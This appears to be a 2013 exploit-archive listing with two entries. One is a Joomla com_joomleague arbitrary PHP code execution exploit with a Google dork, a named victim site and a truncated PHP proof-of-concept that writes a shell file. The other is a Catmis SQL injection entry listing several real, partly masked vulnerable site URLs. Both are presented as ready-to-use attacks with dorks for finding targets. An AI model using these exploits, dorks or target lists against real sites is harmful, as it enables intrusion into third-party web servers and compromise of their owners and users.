webapps exploits

joomla com_joomleague execute arbitrary PHP code Exploit

By |November 4th, 2013|

Exploit Title: joomla com_joomleague execute arbitrary PHP code Exploit
Google Dork: inurl:com_joomleague
Date: [01-11-2013]
Exploit Author: wantexz
Vendor Homepage: http://www.joomleague.net/
Software Link: http://www.joomleague.net/index.php?option=com_jdownloads&Itemid=104&view=viewdownload&catid=2359&cid=242&lang=en
Version: com_joomleague
Tested on: [wantexz]
CVE :
target tested: http://badminton.loiret.free.fr//components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php

POC: 
<?php
$options = getopt(‘u:f:’);

if(!isset($options[‘u’], $options[‘f’]))
die(“\n Usage example: php IDC.php -u http://target.com/ -f IDC.php\n
-u http://target.com/ The full path to Joomla!
-f IDC.php The name of the file to create.\n”);

$url = $options[‘u’];
$file = $options[‘f’];
$shell = […]

Comments Off on joomla com_joomleague execute arbitrary PHP code Exploit

Catmis Sql Injection Vulnerability

By |November 4th, 2013|

Exploit Title : Catmis Sql Injection Vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://code.google.com/p/catmis/
Google Dork : inurl:blog/blog.php?blogId=1 inurl:categoryId=
Date: 2013/11/102

Tested on: Windows 7 , Linux
——————————————————————-
Exploit : Sql Injection
Location : [Target]/www.scienceathome.org/blog/blog.php?blogId=1&categoryId=-1&page=[Sql Injection]
Proof:
http://www.scienceathoXXme.org/blog/blog.php?blogId=1&categoryId=-1&page=’
https://www.vidensbXXroend.dk/blog/blog.php?blogId=1&categoryId=-1&page=’
http://www.geigerXXrecords.dk/blog/blog.php?blogId=1&categoryId=3&page=’
http://solikedorXXian.dk/blog/blog.php?blogId=1&categoryId=1&page=’
http://www.krXweb.dk/blog/blog.php?blogId=1&categoryId=1&page=’

Comments Off on Catmis Sql Injection Vulnerability